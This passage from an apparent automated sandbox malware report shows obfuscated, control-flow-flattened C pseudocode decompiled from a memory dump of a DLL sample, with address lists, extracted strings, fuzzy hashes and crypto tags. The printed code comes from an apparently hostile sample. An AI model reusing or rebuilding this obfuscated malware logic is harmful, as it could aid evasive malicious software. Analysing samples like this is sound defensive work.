				_v88 = 0xae51fb;
				_v88 = _v88 + 0x359a;
				_v88 = _v88 | 0x8b717ce6;
				_v88 = _v88 ^ 0x8bfa7840;
				_v24 = 0xcaf683;
				_v24 = _v24 >> 7;
				_v24 = _v24 ^ 0x00013e33;
				_v52 = 0xefed62;
				_v52 = _v52 | 0x058c509b;
				_v52 = _v52 ^ 0x05e11655;
				_v160 = 0xbd94ea;
				_v160 = _v160 + 0x2a3a;
				_v160 = _v160 >> 5;
				_v160 = _v160 + 0x96e3;
				_v160 = _v160 ^ 0x0003401d;
				_v72 = 0x73d84b;
				_v72 = _v72 + 0x3d83;
				_v72 = _v72 ^ 0x007dedc2;
				_v76 = 0xd9453f;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x006ac7af;
				_v140 = 0x85d58e;
				_v140 = _v140 * 0x2c;
				_v140 = _v140 >> 4;
				_v140 = _v140 / _t398;
				_v140 = _v140 ^ 0x000cf91a;
				_v100 = 0x1458f8;
				_v100 = _v100 ^ 0xd74f5ef9;
				_t399 = 0x5f;
				_v100 = _v100 / _t399;
				_v100 = _v100 ^ 0x0247f1d9;
				_v64 = 0x476ab5;
				_v64 = _v64 + 0xffff3492;
				_v64 = _v64 ^ 0x004c13d1;
				_v148 = 0x4dca07;
				_v148 = _v148 + 0xffff4a4e;
				_v148 = _v148 + 0xffff2093;
				_v148 = _v148 ^ 0x004c8279;
				_v136 = 0xa6ed90;
				_v136 = _v136 >> 2;
				_v136 = _v136 | 0x950d13bb;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 ^ 0x000e92a5;
				_v60 = 0xea20ae;
				_v60 = _v60 * 0x5d;
				_v60 = _v60 ^ 0x550aff98;
				_v92 = 0xe3a2d4;
				_v92 = _v92 >> 6;
				_v92 = _v92 * 0x28;
				_v92 = _v92 ^ 0x008d85d0;
				_v132 = 0x9d5db8;
				_v132 = _v132 + 0xffff1bd6;
				_t400 = 0x1b;
				_v132 = _v132 / _t400;
				_v132 = _v132 << 0xa;
				_v132 = _v132 ^ 0x17217366;
				_v56 = 0xa7c0ff;
				_t401 = 0x35;
				_v56 = _v56 / _t401;
				_v56 = _v56 ^ 0x000623f9;
				_v116 = 0xf9a70;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 >> 5;
				_v116 = _v116 + 0xffffd532;
				_v116 = _v116 ^ 0xfff34a0b;
				_v124 = 0xd1e957;
				_v124 = _v124 << 3;
				_t402 = 0x76;
				_v124 = _v124 / _t402;
				_v124 = _v124 + 0x1a27;
				_v124 = _v124 ^ 0x000dfee3;
				_v84 = 0x8b01d8;
				_t403 = 0x34;
				_v84 = _v84 * 0x70;
				_v84 = _v84 / _t403;
				_v84 = _v84 ^ 0x0120e28f;
				_v32 = 0xcb988c;
				_v32 = _v32 ^ 0x945cb942;
				_v32 = _v32 ^ 0x9495c850;
				_v40 = 0x79d8e1;
				_v40 = _v40 >> 9;
				_v40 = _v40 ^ 0x000c7724;
				_v48 = 0xc03196;
				_v48 = _v48 ^ 0x1279a3f1;
				_v48 = _v48 ^ 0x12baef9a;
				while(1) {
					L1:
					_t368 = 0x9ae396c;
					do {
						L2:
						if(_t444 == 0x19911bc) {
							_push(_v52);
							_push(_v24);
							_push(_v88);
							_t446 = E02B4E1F8(0x2b31a20, _v96, __eflags);
							__eflags = E02B3738A(_v160, _t446, _v72, _v108,  &_v20, 0, _v76) - _v156;
							_t403 = _t446;
							_t444 =  ==  ? 0x9ae396c : 0x7737a40;
							E02B4FECB(_t403, _v140, _v100, _v64, _v148);
							_t448 =  &(_t448[0xb]);
							_t368 = 0x9ae396c;
							goto L12;
						}
						if(_t444 == 0x374f925) {
							_push(_t403);
							_push(_t403);
							_t378 = E02B3C5D8(0x44);
							 *0x2b56220 = _t378;
							 *((intOrPtr*)(_t378 + 0x28)) = 0x4000;
							_t383 =  *0x2b56220; // 0x0
							_t384 = E02B3C5D8( *((intOrPtr*)(_t383 + 0x28)));
							_t438 =  *0x2b56220; // 0x0
							_t448 =  &(_t448[4]);
							_t444 = 0x19911bc;
							_t403 =  *((intOrPtr*)(_t438 + 0x28)) + _t384;
							 *((intOrPtr*)(_t438 + 0x24)) = _t384;
							 *((intOrPtr*)(_t438 + 0x14)) = _t384;
							 *((intOrPtr*)(_t438 + 0x1c)) = _t384;
							 *(_t438 + 0x20) = _t403;
							while(1) {
								L1:
								_t368 = 0x9ae396c;
								goto L2;
							}
						}
						if(_t444 == 0x7737a40) {
							_t439 =  *0x2b56220; // 0x0
							E02B52B09(_v116,  *((intOrPtr*)(_t439 + 0x24)), _v124, _v84);
							_t441 =  *0x2b56220; // 0x0
							E02B52B09(_v32, _t441, _v40, _v48);
							L16:
							return _t391;
						}
						if(_t444 == 0x9042860) {
							E02B3F7FE(_v132, _v20, _v56, _v112);
							goto L16;
						}
						if(_t444 != _t368) {
							goto L12;
						}
						_t389 =  *0x2b56220; // 0x0
						_t403 = _v20;
						_t390 = E02B48B9E(_t403, _v152, _v136, _v60,  *((intOrPtr*)(_t389 + 0x28)),  *((intOrPtr*)(_t389 + 0x24)), _v92);
						_t448 =  &(_t448[5]);
						if(_t390 != _v120) {
							_t444 = 0x7737a40;
						} else {
							_t444 = 0x9042860;
							_t391 = 1;
						}
						goto L1;
						L12:
						__eflags = _t444 - 0xe3acfc2;
					} while (__eflags != 0);
					goto L16;
				}
			}

0x02b42142
0x02b42148
0x02b42155
0x02b42160
0x02b4216f
0x02b42171
0x02b42176
0x02b4217d
0x02b42185
0x02b42193
0x02b42196
0x02b42198
0x02b4219e
0x02b421a6
0x02b421ae
0x02b421bb
0x02b421be
0x02b421c2
0x02b421ca
0x02b421d2
0x02b421df
0x02b421e3
0x02b421e8
0x02b421ed
0x02b421f5
0x02b42202
0x02b42206
0x02b4220e
0x02b42213
0x02b4221b
0x02b42223
0x02b42233
0x02b42237
0x02b4223f
0x02b42247
0x02b4224f
0x02b42257
0x02b4225c
0x02b42264
0x02b4226f
0x02b4227a
0x02b42285
0x02b4228d
0x02b42292
0x02b4229a
0x02b422a5
0x02b422b0
0x02b422bb
0x02b422c7
0x02b422cc
0x02b422d2
0x02b422d7
0x02b422df
0x02b422ea
0x02b422f2
0x02b422fd
0x02b42305
0x02b42311
0x02b42314
0x02b42318
0x02b42320
0x02b4232a
0x02b42338
0x02b4233d
0x02b42343
0x02b4234b
0x02b42353
0x02b4235d
0x02b42360
0x02b42364
0x02b4236c
0x02b42374
0x02b4237c
0x02b42384
0x02b4238c
0x02b42397
0x02b4239f
0x02b423aa
0x02b423b5
0x02b423c0
0x02b423cb
0x02b423d3
0x02b423db
0x02b423e0
0x02b423e8
0x02b423f0
0x02b423f8
0x02b42400
0x02b42408
0x02b42410
0x02b42414
0x02b4241c
0x02b42429
0x02b4242d
0x02b4243a
0x02b4243e
0x02b42446
0x02b4244e
0x02b4245a
0x02b4245d
0x02b42461
0x02b42469
0x02b42471
0x02b42479
0x02b42481
0x02b42489
0x02b42499
0x02b424a1
0x02b424a9
0x02b424b1
0x02b424b6
0x02b424be
0x02b424c3
0x02b424cb
0x02b424d8
0x02b424dc
0x02b424e4
0x02b424ec
0x02b424f6
0x02b424fa
0x02b42502
0x02b4250a
0x02b4251f
0x02b42524
0x02b4252a
0x02b4252f
0x02b42537
0x02b42543
0x02b42548
0x02b4254e
0x02b42556
0x02b4255e
0x02b42563
0x02b42568
0x02b42570
0x02b42578
0x02b42580
0x02b42589
0x02b4258e
0x02b42594
0x02b4259c
0x02b425a4
0x02b425b1
0x02b425b2
0x02b425bc
0x02b425c0
0x02b425c8
0x02b425d3
0x02b425de
0x02b425e9
0x02b425f4
0x02b425fc
0x02b42607
0x02b42612
0x02b4261d
0x02b42628
0x02b42628
0x02b42628
0x02b4262d
0x02b4262d
0x02b42633
0x02b42710
0x02b42719
0x02b42720
0x02b42731
0x02b4275d
0x02b4276b
0x02b4276d
0x02b42778
0x02b4277d
0x02b42780
0x00000000
0x02b42780
0x02b4263f
0x02b426b4
0x02b426b5
0x02b426b8
0x02b426bd
0x02b426c5
0x02b426df
0x02b426e7
0x02b426ec
0x02b426f2
0x02b426f5
0x02b426fd
0x02b426ff
0x02b42702
0x02b42705
0x02b42708
0x02b42628
0x02b42628
0x02b42628
0x00000000
0x02b42628
0x02b42628
0x02b42643
0x02b427b7
0x02b427c4
0x02b427d7
0x02b427e4
0x02b427ef
0x02b427f8
0x02b427f8
0x02b4264f
0x02b427a6
0x00000000
0x02b427ac
0x02b42657
0x00000000
0x00000000
0x02b42661
0x02b4267b
0x02b42682
0x02b42687
0x02b4268e
0x02b4269a
0x02b42690
0x02b42692
0x02b42697
0x02b42697
0x00000000
0x02b42785
0x02b42785
0x02b42785
0x00000000
0x02b42791

Strings

J;, xrefs: 02B422DF
)^^, xrefs: 02B4221B
b, xrefs: 02B423AA
:*, xrefs: 02B423D3
f, xrefs: 02B42160

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: )^^$:*$J;$b$f
API String ID: 0-204930537
Opcode ID: 83533e0e88aaa44801e51251929f34e06ca7d36d81450e7f844e2bcb3670188c
Instruction ID: fcf1333d56718daae73e0eb399b5b9f48970b97d60d626fcea6278c5cbc4a9fd
Opcode Fuzzy Hash: 83533e0e88aaa44801e51251929f34e06ca7d36d81450e7f844e2bcb3670188c
Instruction Fuzzy Hash: 99F120B15083809FC368CF25D58AA0BFBF2FBC4758F50891DF5998A260DBB58949DF42

Uniqueness

Uniqueness Score: -1.00%

Function 02B52009, Relevance: 6.5, Strings: 5, Instructions: 275
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E02B52009() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				unsigned int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				unsigned int _v1176;
				signed int _v1180;
				signed int _v1184;
				void* _t310;
				intOrPtr _t312;
				void* _t315;
				void* _t319;
				void* _t320;
				intOrPtr _t321;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				intOrPtr _t333;
				intOrPtr _t340;
				void* _t364;
				signed int* _t368;

				_t368 =  &_v1184;
				_v1044 = _v1044 & 0x00000000;
				_v1052 = 0x35c0cd;
				_v1048 = 0xa3be33;
				_v1136 = 0x5ade05;
				_v1136 = _v1136 + 0xffffc499;
				_v1136 = _v1136 >> 0xf;
				_v1136 = _v1136 ^ 0x000b842c;
				_v1180 = 0x412a9d;
				_t326 = 0x29;
				_v1180 = _v1180 / _t326;
				_v1180 = _v1180 << 0xb;
				_t364 = 0xe958b9c;
				_v1180 = _v1180 + 0xffff9519;
				_v1180 = _v1180 ^ 0x0cbc23a5;
				_v1156 = 0xd33cfc;
				_v1156 = _v1156 + 0xffff4a87;
				_v1156 = _v1156 ^ 0xbe5aeb75;
				_t327 = 0xb;
				_v1156 = _v1156 * 0x62;
				_v1156 = _v1156 ^ 0xf0302705;
				_v1148 = 0xf18826;
				_v1148 = _v1148 << 1;
				_v1148 = _v1148 >> 0xa;
				_v1148 = _v1148 + 0xffff44eb;
				_v1148 = _v1148 ^ 0xfffe3e21;
				_v1112 = 0x4e0c4f;
				_v1112 = _v1112 + 0x7be6;
				_v1112 = _v1112 ^ 0x004f5571;
				_v1128 = 0xa7ca39;
				_v1128 = _v1128 + 0xffffebca;
				_v1128 = _v1128 / _t327;
				_v1128 = _v1128 ^ 0x000be641;
				_v1176 = 0xb5e613;
				_v1176 = _v1176 << 0xb;
				_v1176 = _v1176 << 0xb;
				_v1176 = _v1176 >> 3;
				_v1176 = _v1176 ^ 0x109d8d71;
				_v1100 = 0x8f570;
				_v1100 = _v1100 << 6;
				_v1100 = _v1100 ^ 0x02300751;
				_v1184 = 0x7a4582;
				_v1184 = _v1184 >> 0xc;
				_v1184 = _v1184 + 0xffff757f;
				_v1184 = _v1184 + 0xcda4;
				_v1184 = _v1184 ^ 0x0000a546;
				_v1140 = 0x8d05f4;
				_v1140 = _v1140 * 3;
				_v1140 = _v1140 | 0x54c49d95;
				_v1140 = _v1140 + 0xffffe0ec;
				_v1140 = _v1140 ^ 0x55e75198;
				_v1108 = 0xd76cc6;
				_v1108 = _v1108 | 0x05cc2328;
				_v1108 = _v1108 ^ 0x05dcca41;
				_v1076 = 0x1bbfa4;
				_v1076 = _v1076 * 0x15;
				_v1076 = _v1076 ^ 0x02435ecc;
				_v1084 = 0x2803a8;
				_v1084 = _v1084 << 0xd;
				_v1084 = _v1084 ^ 0x007964fc;
				_v1092 = 0x1abb48;
				_v1092 = _v1092 ^ 0xd0321100;
				_v1092 = _v1092 ^ 0xd024152f;
				_v1120 = 0x1b785b;
				_v1120 = _v1120 + 0x6594;
				_v1120 = _v1120 ^ 0xc9bc1812;
				_v1120 = _v1120 ^ 0xc9a1a482;
				_v1056 = 0xf96b0d;
				_v1056 = _v1056 | 0x7a81934f;
				_v1056 = _v1056 ^ 0x7af06d17;
				_v1116 = 0xc0176d;
				_t328 = 0x57;
				_v1116 = _v1116 / _t328;
				_v1116 = _v1116 ^ 0x000c7a92;
				_v1144 = 0x386a20;
				_v1144 = _v1144 >> 0xa;
				_t329 = 0x41;
				_v1144 = _v1144 * 0x35;
				_v1144 = _v1144 + 0xffff2f3c;
				_v1144 = _v1144 ^ 0x00015cc7;
				_v1124 = 0xfe7131;
				_v1124 = _v1124 >> 4;
				_v1124 = _v1124 + 0xffffd592;
				_v1124 = _v1124 ^ 0x000ea5e3;
				_v1172 = 0xf233ef;
				_v1172 = _v1172 / _t329;
				_v1172 = _v1172 >> 8;
				_v1172 = _v1172 >> 7;
				_v1172 = _v1172 ^ 0x000dfea7;
				_v1088 = 0xf13b31;
				_v1088 = _v1088 << 4;
				_v1088 = _v1088 ^ 0x0f1b90b2;
				_v1060 = 0x8432f0;
				_v1060 = _v1060 + 0xf898;
				_v1060 = _v1060 ^ 0x00806ced;
				_v1096 = 0x8a20ae;
				_v1096 = _v1096 + 0xffff5c91;
				_v1096 = _v1096 ^ 0x008c8276;
				_v1072 = 0xbc3343;
				_v1072 = _v1072 | 0xeb032685;
				_v1072 = _v1072 ^ 0xebbb8611;
				_v1104 = 0xb5445c;
				_v1104 = _v1104 | 0x38284c17;
				_v1104 = _v1104 ^ 0x38b8f1ba;
				_v1152 = 0x20ddec;
				_t330 = 0x69;
				_v1152 = _v1152 * 0x4d;
				_v1152 = _v1152 >> 1;
				_v1152 = _v1152 << 0xc;
				_v1152 = _v1152 ^ 0x15fd1151;
				_v1132 = 0xda9d4d;
				_v1132 = _v1132 / _t330;
				_v1132 = _v1132 ^ 0x63ba58ef;
				_v1132 = _v1132 ^ 0x63ba5da3;
				_v1080 = 0xcf1222;
				_v1080 = _v1080 | 0x484758e4;
				_v1080 = _v1080 ^ 0x48c184f1;
				_v1064 = 0x309461;
				_v1064 = _v1064 + 0xffffd409;
				_v1064 = _v1064 ^ 0x00392de5;
				_v1164 = 0xd882bd;
				_t331 = 0xc;
				_v1164 = _v1164 / _t331;
				_v1164 = _v1164 + 0x74b;
				_v1164 = _v1164 >> 3;
				_v1164 = _v1164 ^ 0x00039f5a;
				_v1160 = 0x7a48e2;
				_v1160 = _v1160 ^ 0x69cb0a8d;
				_v1160 = _v1160 ^ 0x1624d419;
				_v1160 = _v1160 >> 9;
				_v1160 = _v1160 ^ 0x00301506;
				_v1168 = 0x1f51cb;
				_v1168 = _v1168 ^ 0x7c6813be;
				_v1168 = _v1168 * 0x65;
				_v1168 = _v1168 + 0xffff91bf;
				_v1168 = _v1168 ^ 0x1b097545;
				_v1068 = 0x9ab8d;
				_v1068 = _v1068 + 0x88f0;
				_v1068 = _v1068 ^ 0x000186e4;
				E02B3556B(_t331);
				do {
					while(_t364 != 0x62623fc) {
						if(_t364 == 0x81770e6) {
							return E02B4654A(_v1160, _v1168, __eflags,  &_v520, _v1068,  &_v1040);
						}
						if(_t364 == 0xe065299) {
							_push(_v1124);
							_push(_v1144);
							_push(_v1116);
							_t319 = E02B4E1F8(0x2b31080, _v1056, __eflags);
							_t320 = E02B3DC1B(_v1172);
							_t340 =  *0x2b56214; // 0x0
							_t321 =  *0x2b56214; // 0x0
							E02B544AD(_v1060, __eflags, _v1096,  &_v1040, _t321 + 0x23c, _v1072, _v1104, _t319, _t340 + 0x34, _t320, _v1152);
							_t315 = E02B4FECB(_t319, _v1132, _v1080, _v1064, _v1164);
							_t368 =  &(_t368[0xf]);
							_t364 = 0x81770e6;
							continue;
						}
						if(_t364 != 0xe958b9c) {
							goto L8;
						}
						_t364 = 0x62623fc;
					}
					_push(_v1128);
					_push(_v1112);
					_push(_v1148);
					_t310 = E02B4E1F8(0x2b31000, _v1156, __eflags);
					_t333 =  *0x2b56214; // 0x0
					_t312 =  *0x2b56214; // 0x0
					__eflags = _t312 + 0x23c;
					E02B52D0A(_v1100, _t312 + 0x23c, _t312 + 0x23c, _v1184, _v1140, _v1108, _t333 + 0x34,  &_v520, _t333 + 0x34, _t310);
					_t315 = E02B4FECB(_t310, _v1076, _v1084, _v1092, _v1120);
					_t368 =  &(_t368[0xe]);
					_t364 = 0xe065299;
					L8:
					__eflags = _t364 - 0xc2e12c9;
				} while (__eflags != 0);
				return _t315;
			}

0x02b52009
0x02b5200f
0x02b52019
0x02b52024
0x02b5202f
0x02b52037
0x02b5203f
0x02b52044
0x02b5204c
0x02b5205e
0x02b52063
0x02b52069
0x02b5206e
0x02b52073
0x02b5207b
0x02b52083
0x02b5208b
0x02b52093
0x02b520a0
0x02b520a1
0x02b520a5
0x02b520ad
0x02b520b5
0x02b520b9
0x02b520be
0x02b520c6
0x02b520ce
0x02b520d6
0x02b520de
0x02b520e6
0x02b520ee
0x02b520fc
0x02b52100
0x02b52108
0x02b52110
0x02b52115
0x02b5211a
0x02b5211f
0x02b52127
0x02b5212f
0x02b52134
0x02b5213c
0x02b52144
0x02b52149
0x02b52151
0x02b52159
0x02b52161
0x02b5216e
0x02b52172
0x02b5217a
0x02b52182
0x02b5218a
0x02b52192
0x02b5219a
0x02b521a2
0x02b521af
0x02b521b3
0x02b521bb
0x02b521c3
0x02b521c8
0x02b521d0
0x02b521d8
0x02b521e0
0x02b521e8
0x02b521f0
0x02b521f8
0x02b52200
0x02b52208
0x02b52215
0x02b52220
0x02b5222b
0x02b52239
0x02b5223e
0x02b52244
0x02b5224c
0x02b52254
0x02b5225e
0x02b52261
0x02b52265
0x02b5226d
0x02b52275
0x02b5227d
0x02b52282
0x02b5228a
0x02b52292
0x02b522a2
0x02b522a6
0x02b522ab
0x02b522b0
0x02b522b8
0x02b522c0
0x02b522c5
0x02b522cd
0x02b522d8
0x02b522e3
0x02b522ee
0x02b522f6
0x02b522fe
0x02b52306
0x02b52311
0x02b5231c
0x02b52327
0x02b5232f
0x02b52337
0x02b5233f
0x02b5234c
0x02b5234f
0x02b52353
0x02b52357
0x02b5235c
0x02b52364
0x02b52374
0x02b52378
0x02b52380
0x02b52388
0x02b52390
0x02b52398
0x02b523a0
0x02b523ab
0x02b523b6
0x02b523c1
0x02b523cd
0x02b523d0
0x02b523d4
0x02b523dc
0x02b523e1
0x02b523e9
0x02b523f1
0x02b523f9
0x02b52401
0x02b52406
0x02b5240e
0x02b52416
0x02b52423
0x02b52427
0x02b5242f
0x02b52437
0x02b52442
0x02b5244d
0x02b52460
0x02b52474
0x02b52474
0x02b5247e
0x00000000
0x02b525e3
0x02b52486
0x02b52498
0x02b524a1
0x02b524a5
0x02b524b0
0x02b524bb
0x02b524c7
0x02b524de
0x02b52506
0x02b52523
0x02b52528
0x02b5252b
0x00000000
0x02b5252b
0x02b5248e
0x00000000
0x00000000
0x02b52494
0x02b52494
0x02b52532
0x02b5253b
0x02b5253f
0x02b52547
0x02b5254c
0x02b52571
0x02b5257d
0x02b52587
0x02b525a7
0x02b525ac
0x02b525af
0x02b525b1
0x02b525b1
0x02b525b1
0x00000000

Strings

j8, xrefs: 02B5224C
qUO, xrefs: 02B520DE
XGH, xrefs: 02B52390
Hz, xrefs: 02B523E9
-9, xrefs: 02B523B6

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: j8$qUO$-9$Hz$XGH
API String ID: 0-60989354
Opcode ID: 37b28eee714f5060e362dae63a30eb40f63311595b24fdbd198732b731cf0452
Instruction ID: 713fc891014aa135d8c0be946b7a62aa5c6c28a3b33f5705d1a751247295d590
Opcode Fuzzy Hash: 37b28eee714f5060e362dae63a30eb40f63311595b24fdbd198732b731cf0452
Instruction Fuzzy Hash: 43E122715097809FC3A8CF25C589A5BBBF1FBC4758F508A1CF9D98A260D7B58948CF42

Uniqueness

Uniqueness Score: -1.00%

Function 02B53EE9, Relevance: 6.5, Strings: 5, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E02B53EE9() {
				intOrPtr _t261;
				intOrPtr _t262;
				void* _t268;
				signed char _t274;
				intOrPtr _t277;
				signed int _t288;
				intOrPtr _t289;
				signed char _t296;
				signed int _t316;
				intOrPtr _t326;
				intOrPtr _t330;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				intOrPtr _t342;
				void* _t344;

				 *(_t344 + 0x70) =  *(_t344 + 0x70) & 0x00000000;
				 *(_t344 + 0x74) =  *(_t344 + 0x74) & 0x00000000;
				_t288 = 0x4bd14f4;
				 *((intOrPtr*)(_t344 + 0x6c)) = 0x2dbabe;
				 *(_t344 + 0x4c) = 0x48601c;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) | 0x68876aab;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x68cba8bf;
				 *(_t344 + 8) = 0xdbf1f3;
				 *(_t344 + 0x18) =  *(_t344 + 8) * 9;
				_t333 = 0x4c;
				 *(_t344 + 0x1c) =  *(_t344 + 0x18) / _t333;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) << 0xd;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x4172a216;
				 *(_t344 + 0x3c) = 0x6d1b19;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) | 0x79048263;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) >> 5;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0x03cbeeb4;
				 *(_t344 + 0x18) = 0x1a2d0d;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) >> 6;
				_t334 = 9;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) / _t334;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) + 0xffff8a27;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) ^ 0xfffbe0f3;
				 *(_t344 + 0x5c) = 0xa7cc6c;
				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) >> 4;
				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) ^ 0x000a2772;
				 *(_t344 + 0x38) = 0x67bd1;
				_t335 = 0x3d;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) / _t335;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) << 0x10;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) ^ 0x1b333388;
				 *(_t344 + 0x28) = 0xde9e16;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) | 0xff1d3c4c;
				_t336 = 6;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) / _t336;
				_t337 = 0x70;
				 *(_t344 + 0x24) =  *(_t344 + 0x28) / _t337;
				 *(_t344 + 0x24) =  *(_t344 + 0x24) ^ 0x006adbe6;
				 *(_t344 + 0x20) = 0xac092b;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xc14e4d03;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) + 0x9f69;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0x18e1fb77;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xd908b9ac;
				 *(_t344 + 0x3c) = 0xd958f8;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xf9ce44cf;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) << 0xe;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xc707f990;
				 *(_t344 + 0x1c) = 0x265505;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xffff5b39;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0x9a51;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xc9e0;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x00291d5e;
				 *(_t344 + 0x4c) = 0xea08b8;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0xb1227b65;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) * 0x47;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x4e906ac6;
				 *(_t344 + 0x60) = 0x906ac9;
				_t338 = 0x13;
				_t330 =  *((intOrPtr*)(_t344 + 0x78));
				_t342 =  *((intOrPtr*)(_t344 + 0x78));
				 *(_t344 + 0x60) =  *(_t344 + 0x60) * 3;
				 *(_t344 + 0x60) =  *(_t344 + 0x60) ^ 0x01b02f9b;
				 *(_t344 + 0x48) = 0xe018a0;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) >> 3;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) << 4;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) ^ 0x01c3463d;
				 *(_t344 + 0x44) = 0xcf92eb;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) | 0xa78abf74;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) + 0x2871;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) ^ 0xa7cf65bf;
				 *(_t344 + 0x40) = 0xa30b5e;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) / _t338;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b52837;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b9bcfc;
				 *(_t344 + 0x50) = 0x1f98d4;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x1ce7877d;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) >> 9;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x000a2579;
				 *(_t344 + 0x64) = 0x5b61ba;
				 *(_t344 + 0x64) =  *(_t344 + 0x64) + 0xffffd71d;
				 *(_t344 + 0x64) =  *(_t344 + 0x64) ^ 0x005007f5;
				 *(_t344 + 0x2c) = 0xb4bbf5;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x03029a47;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) >> 0xf;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b7d07c;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b00a56;
				 *(_t344 + 0x28) = 0x1351a7;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) >> 9;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0xc8bf819f;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) * 0x2d;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0x49a4694e;
				 *(_t344 + 0x70) = 0x74ba7c;
				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3ad619e0;
				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3aa46fbb;
				 *(_t344 + 0x30) = 0x6db52d;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) << 9;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) + 0xffffb915;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) | 0x57796199;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) ^ 0xdf7399d9;
				 *(_t344 + 0x54) = 0x4f3eba;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) + 0xffff5dec;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) << 7;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) ^ 0x274d646c;
				while(1) {
					L1:
					_t316 =  *(_t344 + 0x68);
					while(1) {
						L2:
						_t261 =  *((intOrPtr*)(_t344 + 0x6c));
						L3:
						while(_t288 != 0x42bf5b6) {
							if(_t288 == 0x434f657) {
								_push( *(_t344 + 0x1c));
								_push( *(_t344 + 0x40));
								_push( *(_t344 + 0x28));
